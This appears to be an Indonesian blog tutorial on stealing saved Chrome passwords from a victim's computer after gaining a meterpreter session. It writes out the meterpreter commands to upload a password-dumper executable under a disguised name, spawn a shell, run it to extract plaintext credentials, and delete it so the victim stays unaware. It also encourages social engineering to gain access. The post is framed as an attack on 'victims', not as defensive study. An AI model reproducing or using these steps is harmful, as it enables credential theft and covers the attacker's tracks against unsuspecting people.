Dari hasil otak atik google tadi akhir nya saya punya ide untuk
melakukan hal yang menarik ketika kita berhasil mendapatkan akses
meterpreter di komputer korban. Yaitu kita bisa mendownlaod password
yang tersimpan ( saved password ) di browser chrome mereka. Dan
menariknya password ini output nya langsung plan text, tidak perlu di
crack atau di hash lagi.
Langusng saja ya ke tutorial.
Pertama, kalian harus mendownload tools untuk melakukan melakukan dump password di chrome.
Download di Security Exploded . File nya masih berbentuk installer.
Atau kalau kalian ingin tools yang sudah ter ekstrak, kalian bisa mendownload nya disini :
Langkah langkah mendapatkan meterpreter saya anggap kalian sudah mengerti.
kalau masih bingung cari refrensi sebanyak banyak nya di google.
Atau baca artikel ini :
Kalau korban menggunakan OS Windows 7 keatas, pandai pandai lah bermain soceng.
Skip..
Saya anggap kalian sudah mendownload chrome password dumper diatas dan sudah masuk sesi meterpreter.
Upload Password Dumper nya dari lokal machine kita ke OS target.
meterpreter> upload /path/to/ChromePasswordDump.exe jembut.exe
Saya upload tools tadi di Desktop korban dengan nama jembut.exe
Selanjutnya, kita spawn cmd via meterpreter nya.
meterpreter> shell
Sekarang kita jalankan passsword dumper nya dengan perintah :
C:\Users\Uzumaki\Desktop> jembut.exe ( sesuaikan dengan nama file yang kalian upload )
Ane test di VM, jadi saved password nya cuma satu, kalau kalian dapet target asli pasti result lebih banyak.
Gak etis kan kalo ane buat tutorial harus ngorbanin orang lain. Hehe.
Oke, kalo data sudah dapet semua, jangan lupa tools tadi dihapus agar korban gak curiga.
Keluar dulu dari cmd.
C:\Users\Uzumaki\Desktop> exit
Lalu hapus dengan command
meterpreter > rm jembut.exe ( sesuaikan )
Semoga Bermanfaat
Source & Thanks: LinuxSec
No comments:
Post a Comment